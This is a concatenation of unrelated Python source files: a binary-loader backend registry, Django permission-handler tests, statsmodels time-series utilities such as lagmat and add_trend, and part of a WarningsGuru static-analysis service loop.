@classmethod
def check_compatibility(cls, spec, obj): # pylint: disable=unused-argument
"""
Performs a minimal static load of ``spec`` and returns whether it's compatible with ``obj``
"""
return False
ALL_BACKENDS = dict()
def register_backend(name, cls):
if not hasattr(cls, 'is_compatible'):
raise TypeError("Backend needs an is_compatible() method")
ALL_BACKENDS.update({name: cls})
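# Backend implementations typically call register_backend() when they are
# imported, e.g. (illustrative) register_backend('elf', ELF), so that the
# loader can look the class up by name in ALL_BACKENDS.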
from .elf import ELF, ELFCore, MetaELF
from .pe import PE
from .idabin import IDABin
from .blob import Blob
from .cgc import CGC, BackedCGC
from .hex import Hex
from .macho import MachO
|
|
# coding=utf-8
from django.test import TestCase, override_settings
from ..handlers import PermissionHandler
from ..handlers import LogicalPermissionHandler
from .utils import create_user, create_article
from .models import Article
from .compat import MagicMock
@override_settings(
PERMISSION_DEFAULT_PERMISSION_HANDLER=PermissionHandler
)
class PermissionPermissionHandlersTestCase(TestCase):
def setUp(self):
self.handler = PermissionHandler
self.user = create_user('john')
self.perm1 = 'permission.add_article'
self.perm2 = 'permission.change_article'
self.perm3 = 'permission.delete_article'
self.article = create_article('test')
def test_constructor_with_model(self):
instance = self.handler(Article)
self.assertEqual(instance.app_label, 'permission')
self.assertEqual(instance.model, Article)
# backward reference
self.assertEqual(Article._permission_handler, instance)
def test_constructor_with_app_label(self):
instance = self.handler('permission')
self.assertEqual(instance.app_label, 'permission')
self.assertEqual(instance.model, None)
def test__get_app_perms_with_app_label(self):
instance = self.handler('permission')
perms = instance._get_app_perms()
self.assertEquals(perms, set([
'permission.add_article',
'permission.change_article',
'permission.delete_article',
'permission.add_bridge',
'permission.change_bridge',
'permission.delete_bridge',
]))
def test__get_app_perms_with_model(self):
instance = self.handler(Article)
perms = instance._get_app_perms()
self.assertEquals(perms, set([
'permission.add_article',
'permission.change_article',
'permission.delete_article',
'permission.add_bridge',
'permission.change_bridge',
'permission.delete_bridge',
]))
def test__get_model_perms(self):
instance = self.handler(Article)
perms = instance._get_model_perms()
self.assertEquals(perms, set([
'permission.add_article',
'permission.change_article',
'permission.delete_article',
]))
def test_get_supported_permissions(self):
instance = self.handler(Article)
perms = instance.get_supported_permissions()
self.assertEquals(perms, set([
'permission.add_article',
'permission.change_article',
'permission.delete_article',
]))
def test_get_supported_permissions_with_includes(self):
instance = self.handler(Article)
instance.includes = [
'permission.add_article',
'permission.change_article',
]
perms = instance.get_supported_permissions()
self.assertEquals(perms, set([
'permission.add_article',
'permission.change_article',
]))
def test_get_supported_permissions_with_includes_change(self):
instance = self.handler(Article)
instance.includes = [
'permission.add_article',
'permission.change_article',
]
instance.get_supported_permissions()
instance.includes = [
'permission.change_article',
]
perms = instance.get_supported_permissions()
self.assertEquals(perms, set([
'permission.change_article',
]))
def test_get_supported_permissions_with_excludes(self):
instance = self.handler(Article)
instance.excludes = [
'permission.add_article',
]
perms = instance.get_supported_permissions()
self.assertEquals(perms, set([
'permission.change_article',
'permission.delete_article',
]))
def test_get_supported_permissions_with_excludes_change(self):
instance = self.handler(Article)
instance.excludes = [
'permission.add_article',
]
instance.get_supported_permissions()
instance.excludes = []
perms = instance.get_supported_permissions()
self.assertEquals(perms, set([
'permission.add_article',
'permission.change_article',
'permission.delete_article',
]))
def test_get_supported_app_labels(self):
instance = self.handler(Article)
app_labels = instance.get_supported_app_labels()
self.assertEquals(app_labels, set([
'permission',
]))
def test_get_supported_app_labels_with_includes(self):
instance = self.handler(Article)
instance.includes = [
'permission.add_article',
'permission.change_article',
]
app_labels = instance.get_supported_app_labels()
self.assertEquals(app_labels, set([
'permission',
]))
def test_get_supported_app_labels_with_includes_change(self):
instance = self.handler(Article)
instance.includes = [
'permission.add_article',
'permission.change_article',
]
instance.get_supported_app_labels()
instance.includes = [
'permission.change_article',
]
app_labels = instance.get_supported_app_labels()
self.assertEquals(app_labels, set([
'permission',
]))
def test_get_supported_app_labels_with_excludes(self):
instance = self.handler(Article)
instance.excludes = [
'permission.add_article',
]
app_labels = instance.get_supported_app_labels()
self.assertEquals(app_labels, set([
'permission',
]))
def test_get_supported_app_labels_with_excludes_change(self):
instance = self.handler(Article)
instance.excludes = [
'permission.add_article',
]
instance.get_supported_app_labels()
instance.excludes = []
app_labels = instance.get_supported_app_labels()
self.assertEquals(app_labels, set([
'permission',
]))
def test_has_perm_add_without_obj(self):
instance = self.handler(Article)
self.assertRaises(
NotImplementedError,
instance.has_perm,
self.user, self.perm1)
def test_has_perm_change_without_obj(self):
instance = self.handler(Article)
self.assertRaises(
NotImplementedError,
instance.has_perm,
self.user, self.perm2)
def test_has_perm_delete_without_obj(self):
instance = self.handler(Article)
self.assertRaises(
NotImplementedError,
instance.has_perm,
self.user, self.perm3)
def test_has_perm_add_with_obj(self):
instance = self.handler(Article)
self.assertRaises(
NotImplementedError,
instance.has_perm,
self.user, self.perm1, self.article)
def test_has_perm_change_with_obj(self):
instance = self.handler(Article)
self.assertRaises(
NotImplementedError,
instance.has_perm,
self.user, self.perm2, self.article)
def test_has_perm_delete_with_obj(self):
instance = self.handler(Article)
self.assertRaises(
NotImplementedError,
instance.has_perm,
self.user, self.perm3, self.article)
def test_has_module_perms_success(self):
instance = self.handler(Article)
user = MagicMock()
user.has_perm.return_value = True
self.assertTrue(instance.has_module_perms(user, 'permission'))
self.assertTrue(user.has_perm.called)
def test_has_module_perms_fail(self):
instance = self.handler(Article)
user = MagicMock()
user.has_perm.return_value = True
self.assertFalse(instance.has_module_perms(user, 'unknown'))
self.assertFalse(user.has_perm.called)
@override_settings(
PERMISSION_DEFAULT_PERMISSION_HANDLER=LogicalPermissionHandler,
)
class PermissionLogicalPermissionHandlerTestCase(TestCase):
def setUp(self):
# make sure all caches are removed
Article._permission_logics = set()
self.handler = LogicalPermissionHandler
self.user = create_user('john')
self.perm1 = 'permission.add_article'
self.perm2 = 'permission.change_article'
self.perm3 = 'permission.delete_article'
self.article = create_article('test')
from permission.logics import PermissionLogic
from permission import add_permission_logic
self.mock_logic1 = MagicMock(spec=PermissionLogic)
self.mock_logic1.has_perm = MagicMock(return_value=False)
self.mock_logic2 = MagicMock(spec=PermissionLogic)
self.mock_logic2.has_perm = MagicMock(return_value=False)
add_permission_logic(Article, self.mock_logic1)
add_permission_logic(Article, self.mock_logic2)
def test_constructor_with_app_label(self):
self.assertRaises(AttributeError,
self.handler, 'permission')
def test_has_perm_non_related_permission(self):
instance = self.handler(Article)
instance.get_supported_permissions = MagicMock(return_value=[
'permission.add_article',
'permission.change_article',
'permission.delete_article',
])
self.assertFalse(instance.has_perm(self.user, 'unknown'))
self.assertFalse(instance.has_perm(self.user, 'unknown', self.article))
def test_has_perm_permission_logics_called(self):
instance = self.handler(Article)
instance.get_supported_permissions = MagicMock(return_value=[
'permission.add_article',
'permission.change_article',
'permission.delete_article',
])
self.assertFalse(self.mock_logic1.has_perm.called)
self.assertFalse(self.mock_logic2.has_perm.called)
self.assertFalse(instance.has_perm(self.user,
'permission.add_article'))
self.assertTrue(self.mock_logic1.has_perm.called)
self.assertTrue(self.mock_logic2.has_perm.called)
self.assertEqual(self.mock_logic1.has_perm.call_count, 1)
self.assertEqual(self.mock_logic2.has_perm.call_count, 1)
# permission check should be cached thus `has_perm` should not be
# called twice for same user instance
self.assertFalse(instance.has_perm(self.user,
'permission.add_article'))
self.assertEqual(self.mock_logic1.has_perm.call_count, 1)
self.assertEqual(self.mock_logic2.has_perm.call_count, 1)
|
|
from statsmodels.compat.python import range, lrange, lzip, long
import numpy as np
import numpy.lib.recfunctions as nprf
import pandas as pd
from pandas import DataFrame
from pandas.tseries import offsets
from pandas.tseries.frequencies import to_offset
from statsmodels.tools.sm_exceptions import ValueWarning
from statsmodels.tools.data import _is_using_pandas, _is_recarray
def add_trend(x, trend="c", prepend=False, has_constant='skip'):
"""
Adds a trend and/or constant to an array.
Parameters
----------
x : array-like
Original array of data.
trend : str {"c","t","ct","ctt"}
"c" add constant only
"t" add trend only
"ct" add constant and linear trend
"ctt" add constant and linear and quadratic trend.
prepend : bool
If True, prepends the new data to the columns of X.
has_constant : str {'raise', 'add', 'skip'}
Controls what happens when trend is 'c' and a constant already
exists in X. 'raise' will raise an error. 'add' will duplicate a
constant. 'skip' will return the data without change. 'skip' is the
default.
Returns
-------
y : array, recarray or DataFrame
The original data with the additional trend columns. If x is a
recarray or pandas Series or DataFrame, then the trend column names
are 'const', 'trend' and 'trend_squared'.
Notes
-----
Returns columns as ["ctt","ct","c"] whenever applicable. There is currently
no checking for an existing trend.
See also
--------
statsmodels.tools.add_constant
"""
# TODO: could be generalized for trend of arbitrary order
trend = trend.lower()
columns = ['const', 'trend', 'trend_squared']
if trend == "c": # handles structured arrays
columns = columns[:1]
trendorder = 0
elif trend == "ct" or trend == "t":
columns = columns[:2]
if trend == "t":
columns = columns[1:2]
trendorder = 1
elif trend == "ctt":
trendorder = 2
else:
raise ValueError("trend %s not understood" % trend)
is_recarray = _is_recarray(x)
is_pandas = _is_using_pandas(x, None) or is_recarray
if is_pandas or is_recarray:
if is_recarray:
descr = x.dtype.descr
x = pd.DataFrame.from_records(x)
elif isinstance(x, pd.Series):
x = pd.DataFrame(x)
else:
x = x.copy()
else:
x = np.asanyarray(x)
nobs = len(x)
trendarr = np.vander(np.arange(1, nobs + 1, dtype=np.float64), trendorder + 1)
# put in order ctt
trendarr = np.fliplr(trendarr)
if trend == "t":
trendarr = trendarr[:, 1]
if "c" in trend:
if is_pandas or is_recarray:
# Mixed type protection
def safe_is_const(s):
try:
return np.ptp(s) == 0.0 and np.any(s != 0.0)
except:
return False
col_const = x.apply(safe_is_const, 0)
else:
col_const = np.logical_and(np.any(np.ptp(np.asanyarray(x), axis=0) == 0, axis=0),
np.all(x != 0.0, axis=0))
if np.any(col_const):
if has_constant == 'raise':
raise ValueError("x already contains a constant")
elif has_constant == 'skip':
columns = columns[1:]
trendarr = trendarr[:, 1:]
order = 1 if prepend else -1
if is_recarray or is_pandas:
trendarr = pd.DataFrame(trendarr, index=x.index, columns=columns)
x = [trendarr, x]
x = pd.concat(x[::order], 1)
else:
x = [trendarr, x]
x = np.column_stack(x[::order])
if is_recarray:
x = x.to_records(index=False, convert_datetime64=False)
new_descr = x.dtype.descr
extra_col = len(new_descr) - len(descr)
descr = new_descr[:extra_col] + descr if prepend else descr + new_descr[-extra_col:]
x = x.astype(np.dtype(descr))
return x
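# Illustrative example (plain ndarray input, prepend=False):
# >>> add_trend(np.arange(1, 5.), trend='ct')
# array([[ 1.,  1.,  1.],
#        [ 2.,  1.,  2.],
#        [ 3.,  1.,  3.],
#        [ 4.,  1.,  4.]])
# i.e. the original column followed by the 'const' and 'trend' columns.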
def add_lag(x, col=None, lags=1, drop=False, insert=True):
"""
Returns an array with lags included given an array.
Parameters
----------
x : array
An array or NumPy ndarray subclass. Can be either a 1d or 2d array with
observations in columns.
col : 'string', int, or None
If data is a structured array or a recarray, `col` can be a string
that is the name of the column containing the variable. Or `col` can
be an int of the zero-based column index. If it's a 1d array `col`
can be None.
lags : int
The number of lags desired.
drop : bool
Whether to keep the contemporaneous variable for the data.
insert : bool or int
If True, inserts the lagged values after `col`. If False, appends
the data. If int inserts the lags at int.
Returns
-------
array : ndarray
Array with lags
Examples
--------
>>> import statsmodels.api as sm
>>> data = sm.datasets.macrodata.load()
>>> data = data.data[['year','quarter','realgdp','cpi']]
>>> data = sm.tsa.add_lag(data, 'realgdp', lags=2)
Notes
-----
Trims the array both forward and backward, so that the length of the
returned array is len(`x`) - lags. The lags are returned in increasing
order, i.e., t-1, t-2, ..., t-lags.
"""
if x.dtype.names:
names = x.dtype.names
if not col and np.squeeze(x).ndim > 1:
raise IndexError("col is None and the input array is not 1d")
elif len(names) == 1:
col = names[0]
if isinstance(col, (int, long)):
col = x.dtype.names[col]
contemp = x[col]
# make names for lags
tmp_names = [col + '_'+'L(%i)' % i for i in range(1,lags+1)]
ndlags = lagmat(contemp, maxlag=lags, trim='Both')
# get index for return
if insert is True:
ins_idx = list(names).index(col) + 1
elif insert is False:
ins_idx = len(names) + 1
else: # insert is an int
if insert > len(names):
import warnings
warnings.warn("insert > number of variables, inserting at the"
" last position", ValueWarning)
ins_idx = insert
first_names = list(names[:ins_idx])
last_names = list(names[ins_idx:])
if drop:
if col in first_names:
first_names.pop(first_names.index(col))
else:
last_names.pop(last_names.index(col))
if first_names: # only do this if x isn't "empty"
first_arr = nprf.append_fields(x[first_names][lags:],tmp_names,
ndlags.T, usemask=False)
else:
first_arr = np.zeros(len(x)-lags, dtype=lzip(tmp_names,
(x[col].dtype,)*lags))
for i,name in enumerate(tmp_names):
first_arr[name] = ndlags[:,i]
if last_names:
return nprf.append_fields(first_arr, last_names,
[x[name][lags:] for name in last_names], usemask=False)
else: # lags for last variable
return first_arr
else: # we have an ndarray
if x.ndim == 1: # make 2d if 1d
x = x[:,None]
if col is None:
col = 0
# handle negative index
if col < 0:
col = x.shape[1] + col
contemp = x[:,col]
if insert is True:
ins_idx = col + 1
elif insert is False:
ins_idx = x.shape[1]
else:
if insert < 0: # handle negative index
insert = x.shape[1] + insert + 1
if insert > x.shape[1]:
insert = x.shape[1]
import warnings
warnings.warn("insert > number of variables, inserting at the"
" last position", ValueWarning)
ins_idx = insert
ndlags = lagmat(contemp, lags, trim='Both')
first_cols = lrange(ins_idx)
last_cols = lrange(ins_idx,x.shape[1])
if drop:
if col in first_cols:
first_cols.pop(first_cols.index(col))
else:
last_cols.pop(last_cols.index(col))
return np.column_stack((x[lags:,first_cols],ndlags,
x[lags:,last_cols]))
def detrend(x, order=1, axis=0):
"""
Detrend an array with a trend of given order along axis 0 or 1
Parameters
----------
x : array_like, 1d or 2d
data; if 2d, then each row or column is detrended independently with the
same trend order, but with its own trend estimate
order : int
specifies the polynomial order of the trend, zero is constant, one is
linear trend, two is quadratic trend
axis : int
axis can be either 0, observations by rows,
or 1, observations by columns
Returns
-------
detrended data series : ndarray
The detrended series is the residual of the linear regression of the
data on the trend of given order.
"""
if x.ndim == 2 and int(axis) == 1:
x = x.T
elif x.ndim > 2:
raise NotImplementedError('x.ndim > 2 is not implemented until it is needed')
nobs = x.shape[0]
if order == 0:
# Special case demean
resid = x - x.mean(axis=0)
else:
trends = np.vander(np.arange(float(nobs)), N=order + 1)
beta = np.linalg.pinv(trends).dot(x)
resid = x - np.dot(trends, beta)
if x.ndim == 2 and int(axis) == 1:
resid = resid.T
return resid
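# Illustrative example: detrending a noiseless straight line leaves residuals
# that are zero up to floating-point error.
# >>> detrend(np.arange(5.), order=1)
# array([ 0.,  0.,  0.,  0.,  0.])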
def lagmat(x, maxlag, trim='forward', original='ex', use_pandas=False):
"""
Create 2d array of lags
Parameters
----------
x : array_like, 1d or 2d
data; if 2d, observation in rows and variables in columns
maxlag : int
all lags from zero to maxlag are included
trim : str {'forward', 'backward', 'both', 'none'} or None
* 'forward' : trim invalid observations in front
* 'backward' : trim invalid initial observations
* 'both' : trim invalid observations on both sides
* 'none', None : no trimming of observations
original : str {'ex','sep','in'}
* 'ex' : drops the original array returning only the lagged values.
* 'in' : returns the original array and the lagged values as a single
array.
* 'sep' : returns a tuple (original array, lagged values). The original
array is truncated to have the same number of rows as
the returned lagmat.
use_pandas : bool, optional
If true, returns a DataFrame when the input is a pandas
Series or DataFrame. If false, return numpy ndarrays.
Returns
-------
lagmat : 2d array
array with lagged observations
y : 2d array, optional
Only returned if original == 'sep'
Examples
--------
>>> from statsmodels.tsa.tsatools import lagmat
>>> import numpy as np
>>> X = np.arange(1,7).reshape(-1,2)
>>> lagmat(X, maxlag=2, trim="forward", original='in')
array([[ 1., 2., 0., 0., 0., 0.],
[ 3., 4., 1., 2., 0., 0.],
[ 5., 6., 3., 4., 1., 2.]])
>>> lagmat(X, maxlag=2, trim="backward", original='in')
array([[ 5., 6., 3., 4., 1., 2.],
[ 0., 0., 5., 6., 3., 4.],
[ 0., 0., 0., 0., 5., 6.]])
>>> lagmat(X, maxlag=2, trim="both", original='in')
array([[ 5., 6., 3., 4., 1., 2.]])
>>> lagmat(X, maxlag=2, trim="none", original='in')
array([[ 1., 2., 0., 0., 0., 0.],
[ 3., 4., 1., 2., 0., 0.],
[ 5., 6., 3., 4., 1., 2.],
[ 0., 0., 5., 6., 3., 4.],
[ 0., 0., 0., 0., 5., 6.]])
Notes
-----
When using a pandas DataFrame or Series with use_pandas=True, trim can only
be 'forward' or 'both' since it is not possible to consistently extend index
values.
"""
# TODO: allow list of lags additional to maxlag
is_pandas = _is_using_pandas(x, None) and use_pandas
trim = 'none' if trim is None else trim
trim = trim.lower()
if is_pandas and trim in ('none', 'backward'):
raise ValueError("trim cannot be 'none' or 'forward' when used on "
"Series or DataFrames")
xa = np.asarray(x)
dropidx = 0
if xa.ndim == 1:
xa = xa[:, None]
nobs, nvar = xa.shape
if original in ['ex', 'sep']:
dropidx = nvar
if maxlag >= nobs:
raise ValueError("maxlag should be < nobs")
lm = np.zeros((nobs + maxlag, nvar * (maxlag + 1)))
for k in range(0, int(maxlag + 1)):
lm[maxlag - k:nobs + maxlag - k,
nvar * (maxlag - k):nvar * (maxlag - k + 1)] = xa
if trim in ('none', 'forward'):
startobs = 0
elif trim in ('backward', 'both'):
startobs = maxlag
else:
raise ValueError('trim option not valid')
if trim in ('none', 'backward'):
stopobs = len(lm)
else:
stopobs = nobs
if is_pandas:
x_columns = x.columns if isinstance(x, DataFrame) else [x.name]
columns = [str(col) for col in x_columns]
for lag in range(maxlag):
lag_str = str(lag + 1)
columns.extend([str(col) + '.L.' + lag_str for col in x_columns])
lm = DataFrame(lm[:stopobs], index=x.index, columns=columns)
lags = lm.iloc[startobs:]
if original in ('sep', 'ex'):
leads = lags[x_columns]
lags = lags.drop(x_columns, 1)
else:
lags = lm[startobs:stopobs, dropidx:]
if original == 'sep':
leads = lm[startobs:stopobs, :dropidx]
if original == 'sep':
return lags, leads
else:
return lags
def lagmat2ds(x, maxlag0, maxlagex=None, dropex=0, trim='forward'):
'''generate lagmatrix for 2d array, columns arranged by variables
Parameters
----------
x : array_like, 2d
2d data, observation in rows and variables in columns
maxlag0 : int
for first variable all lags from zero to maxlag are included
maxlagex : None or int
max lag for all other variables all lags from zero to maxlag are included
dropex : int (default is 0)
exclude the first dropex lags from the other variables;
for all variables except the first, lags from dropex to maxlagex are
included
trim : string
* 'forward' : trim invalid observations in front
* 'backward' : trim invalid initial observations
* 'both' : trim invalid observations on both sides
* 'none' : no trimming of observations
Returns
-------
lagmat : 2d array
array with lagged observations, columns ordered by variable
Notes
-----
very inefficient for unequal lags, just done for convenience
'''
if maxlagex is None:
maxlagex = maxlag0
maxlag = max(maxlag0, maxlagex)
nobs, nvar = x.shape
lagsli = [lagmat(x[:,0], maxlag, trim=trim, original='in')[:,:maxlag0+1]]
for k in range(1,nvar):
lagsli.append(lagmat(x[:,k], maxlag, trim=trim, original='in')[:,dropex:maxlagex+1])
return np.column_stack(lagsli)
def vec(mat):
return mat.ravel('F')
def vech(mat):
# Gets Fortran-order
return mat.T.take(_triu_indices(len(mat)))
# tril/triu/diag, suitable for ndarray.take
def _tril_indices(n):
rows, cols = np.tril_indices(n)
return rows * n + cols
def _triu_indices(n):
rows, cols = np.triu_indices(n)
return rows * n + cols
def _diag_indices(n):
rows, cols = np.diag_indices(n)
return rows * n + cols
def unvec(v):
k = int(np.sqrt(len(v)))
assert(k * k == len(v))
return v.reshape((k, k), order='F')
def unvech(v):
# quadratic formula, correct fp error
rows = .5 * (-1 + np.sqrt(1 + 8 * len(v)))
rows = int(np.round(rows))
result = np.zeros((rows, rows))
result[np.triu_indices(rows)] = v
result = result + result.T
# divide diagonal elements by 2
result[np.diag_indices(rows)] /= 2
return result
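# Illustrative round trip for a 2x2 symmetric matrix:
# >>> S = np.array([[1., 2.], [2., 3.]])
# >>> vech(S)
# array([ 1.,  2.,  3.])
# >>> unvech(vech(S))
# array([[ 1.,  2.],
#        [ 2.,  3.]])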
def duplication_matrix(n):
"""
Create duplication matrix D_n which satisfies vec(S) = D_n vech(S) for
symmetric matrix S
Returns
-------
D_n : ndarray
"""
tmp = np.eye(n * (n + 1) // 2)
return np.array([unvech(x).ravel() for x in tmp]).T
def elimination_matrix(n):
"""
Create the elimination matrix L_n which satisfies vech(M) = L_n vec(M) for
any matrix M
Parameters
----------
n : int
The dimension of the (n x n) matrices M.
Returns
-------
L_n : ndarray
"""
vech_indices = vec(np.tril(np.ones((n, n))))
return np.eye(n * n)[vech_indices != 0]
def commutation_matrix(p, q):
"""
Create the commutation matrix K_{p,q} satisfying vec(A') = K_{p,q} vec(A)
Parameters
----------
p : int
q : int
Returns
-------
K : ndarray (pq x pq)
"""
K = np.eye(p * q)
indices = np.arange(p * q).reshape((p, q), order='F')
return K.take(indices.ravel(), axis=0)
def _ar_transparams(params):
"""
Transforms params to induce stationarity/invertibility.
Parameters
----------
params : array
The AR coefficients
Reference
---------
Jones(1980)
"""
newparams = ((1-np.exp(-params))/
(1+np.exp(-params))).copy()
tmp = ((1-np.exp(-params))/
(1+np.exp(-params))).copy()
for j in range(1,len(params)):
a = newparams[j]
for kiter in range(j):
tmp[kiter] -= a * newparams[j-kiter-1]
newparams[:j] = tmp[:j]
return newparams
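# Note: the element-wise map (1 - exp(-p)) / (1 + exp(-p)) equals tanh(p / 2),
# which squashes each raw parameter into (-1, 1); the loop then applies the
# Jones (1980) Levinson-Durbin-style recursion to convert those partial
# autocorrelations into the coefficients of a stationary AR polynomial.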
def _ar_invtransparams(params):
"""
Inverse of the Jones reparameterization
Parameters
----------
params : array
The transformed AR coefficients
"""
# AR coeffs
tmp = params.copy()
for j in range(len(params)-1,0,-1):
a = params[j]
for kiter in range(j):
tmp[kiter] = (params[kiter] + a * params[j-kiter-1])/\
(1-a**2)
params[:j] = tmp[:j]
invarcoefs = -np.log((1-params)/(1+params))
return invarcoefs
def _ma_transparams(params):
"""
Transforms params to induce stationarity/invertibility.
Parameters
----------
params : array
The MA coefficients of an (AR)MA model.
Reference
---------
Jones(1980)
"""
newparams = ((1-np.exp(-params))/(1+np.exp(-params))).copy()
tmp = ((1-np.exp(-params))/(1+np.exp(-params))).copy()
# levinson-durbin to get macf
for j in range(1,len(params)):
b = newparams[j]
for kiter in range(j):
tmp[kiter] += b * newparams[j-kiter-1]
newparams[:j] = tmp[:j]
return newparams
def _ma_invtransparams(macoefs):
"""
Inverse of the Jones reparameterization
Parameters
----------
macoefs : array
The transformed MA coefficients
"""
tmp = macoefs.copy()
for j in range(len(macoefs)-1,0,-1):
b = macoefs[j]
for kiter in range(j):
tmp[kiter] = (macoefs[kiter]-b *macoefs[j-kiter-1])/(1-b**2)
macoefs[:j] = tmp[:j]
invmacoefs = -np.log((1-macoefs)/(1+macoefs))
return invmacoefs
def unintegrate_levels(x, d):
"""
Returns the successive differences needed to unintegrate the series.
Parameters
----------
x : array-like
The original series
d : int
The number of differences of the differenced series.
Returns
-------
y : array-like
The increasing differences from 0 to d-1 of the first d elements
of x.
See Also
--------
unintegrate
"""
x = x[:d]
return np.asarray([np.diff(x, d - i)[0] for i in range(d, 0, -1)])
def unintegrate(x, levels):
"""
After taking n-differences of a series, return the original series
Parameters
----------
x : array-like
The n-th differenced series
levels : list
A list of the first-value in each differenced series, for
[first-difference, second-difference, ..., n-th difference]
Returns
-------
y : array-like
The original series de-differenced
Examples
--------
>>> x = np.array([1, 3, 9., 19, 8.])
>>> levels = unintegrate_levels(x, 2)
>>> levels
array([ 1., 2.])
>>> unintegrate(np.diff(x, 2), levels)
array([ 1., 3., 9., 19., 8.])
"""
levels = list(levels)[:] # copy
if len(levels) > 1:
x0 = levels.pop(-1)
return unintegrate(np.cumsum(np.r_[x0, x]), levels)
x0 = levels[0]
return np.cumsum(np.r_[x0, x])
def freq_to_period(freq):
"""
Convert a pandas frequency to a periodicity
Parameters
----------
freq : str or offset
Frequency to convert
Returns
-------
period : int
Periodicity of freq
Notes
-----
Annual maps to 1, quarterly maps to 4, monthly to 12, weekly to 52,
daily to 7, business-daily to 5, and hourly to 24.
"""
if not isinstance(freq, offsets.DateOffset):
freq = to_offset(freq) # go ahead and standardize
freq = freq.rule_code.upper()
if freq == 'A' or freq.startswith(('A-', 'AS-')):
return 1
elif freq == 'Q' or freq.startswith(('Q-', 'QS-')):
return 4
elif freq == 'M' or freq.startswith(('M-', 'MS')):
return 12
elif freq == 'W' or freq.startswith('W-'):
return 52
elif freq == 'D':
return 7
elif freq == 'B':
return 5
elif freq == 'H':
return 24
else: # pragma : no cover
raise ValueError("freq {} not understood. Please report if you "
"think this in error.".format(freq))
__all__ = ['lagmat', 'lagmat2ds','add_trend', 'duplication_matrix',
'elimination_matrix', 'commutation_matrix',
'vec', 'vech', 'unvec', 'unvech']
|
|
"""
The MIT License (MIT)
Copyright (c) 2016-2017 Louis-Philippe Querel [email protected]
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute,
sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from psycopg2._psycopg import IntegrityError
from static_analysis_runner.post_build_runner import run
import subprocess
import time
from db_versioning import flyway_runner
from kdm_extractor import extract
from repos.repo_manager import load_repository, clear_all_repositories
from repos.git import GIT
from utility.artifact_archiver import archive, artifact_archiver_version
from utility.commit import commit_params
from utility.jdk_override import JdkOverride
from utility.mvn_override import MvnOverride
from utility.service_sql import *
import config
from config import *
from warning_recovery.file_change_history import get_commit_file_history
from warning_recovery.warning_tracing import commit_warning_recovery
"""
The purpose of this script is to automatically run the TOIF adaptors on each commit that commitguru has analysed.
"""
PROJECT_NAME = "WarningsGuru"
VERSION = "0.1.2"
BUILD_SUCCESS = "BUILD"
BUILD_FAILED = "FAILURE"
class WarningsGuruService:
def __init__(self):
logger.info("Starting %s - version %s" % (PROJECT_NAME, VERSION))
# TODO check dependencies for all modules (toif, git, commitguru, maven, etc.)
db = config.get_local_settings()
# Checking the state of database and attempting to migrate if necessary
flyway_runner.migrate_db(db[DATABASE_HOST], db[DATABASE_PORT], db[DATABASE_NAME], db[DATABASE_USERNAME], db[DATABASE_PASSWORD])
# Load overrides
self._jdk_override_loader()
self._maven_override_loader()
# Once everything has been validated we can start the service
logger.info("Service prerequisites check complete. Starting %s" % PROJECT_NAME)
self._start_service()
def _jdk_override_loader(self):
self.jdk_override = self.__generic_override_loader("JDK", JdkOverride)
def _maven_override_loader(self):
self.mvn_override = self.__generic_override_loader("MVN", MvnOverride)
def __generic_override_loader(self, conf_variable, override_class):
if "OVERRIDES" in dir(config) and isinstance(config.OVERRIDES, dict):
if conf_variable in OVERRIDES and isinstance(OVERRIDES[conf_variable], list):
override = override_class(OVERRIDES[conf_variable])
logger.info("Loaded the following %s overrides %s" % (override.name, str(override.overrides)))
return override
else:
logger.warn("%s is missing from OVERRIDES in config file" % conf_variable)
return override_class([])
else:
logger.warn("OVERRIDES is missing from config file")
return override_class([])
def _start_service(self):
service_db = Service_DB(REPROCESS_FAILURES_HOURS)
while True:
# clear repos
clear_all_repositories(REPOSITORY_CACHE_PATH)
service_db.truncate_commit_processing()
commits = service_db.get_unprocessed_commits()
if len(commits) > 0:
# Checkout repo to commit
for commit in commits:
repo_id, commit_hash, repo_path = commit_params(commit)
author_date = commit['author_date'].date()
try:
self._process_commit(service_db, repo_id, commit_hash, repo_path, author_date)
except IntegrityError as error:
logger.error("%s: Database error: %s" % (commit_hash, error.message))
service_db.processing_commit_sql_failed(repo_id, commit_hash, error.message)
# Once all the commits in the batch have been ran we need to obtain the warnings recovery
for commit in commits:
repo_id, commit_hash, repo_path = commit_params(commit)
commit_warning_recovery(service_db.db, repo_id, commit_hash, repo_path)
else:
logger.info("No new tasks to run. Going to sleep for %s minutes" % BACKGROUND_SLEEP_MINUTES)
time.sleep(BACKGROUND_SLEEP_MINUTES*60)
def _process_commit(self, service_db, repo_id, commit_hash, repo_path, author_date):
# Update db to reflect that we are processing the commit
service_db.processing_commit(repo_id, commit_hash)
# Clear out any previous runs of the commit
service_db.clear_commit_data(repo_id, commit_hash)
# load the repository if it does not exist or if it is not up to date with the commit to analyse
if not load_repository(repo_id, repo_path, commit_hash):
# Failed to load the repo or the commit
commit_result = "COMMIT_MISSING"
log = "repo or commit not loaded"
else:
commit_result, log = self.checkout_and_build_commit(commit_hash, repo_path, author_date)
# We run static analysis even if the build has failed, as a project is usually composed of
# sub-projects and we might be able to recover some of the warnings
if commit_result in [BUILD_SUCCESS, BUILD_FAILED]:
# Run static analysis on the generated, modified class files
logger.info("%s: Running static analysis" % commit_hash)
class_file_mapping = _run_static_analysis(repo_path, commit_hash)
if len(class_file_mapping) > 0:
logger.info("%s: Running TOIF file warnings assimilator" % commit_hash)
# Build was successful so we can continue
log = "\n".join((log, run_assimilator(repo_path)))
logger.info("%s: Attempting to extract file warnings from assimilator" % commit_hash)
_manage_assimilator_result(repo_id, commit_hash, repo_path, service_db, class_file_mapping)
else:
logger.info("%s: No TOIF file warnings to assimilate" % commit_hash)
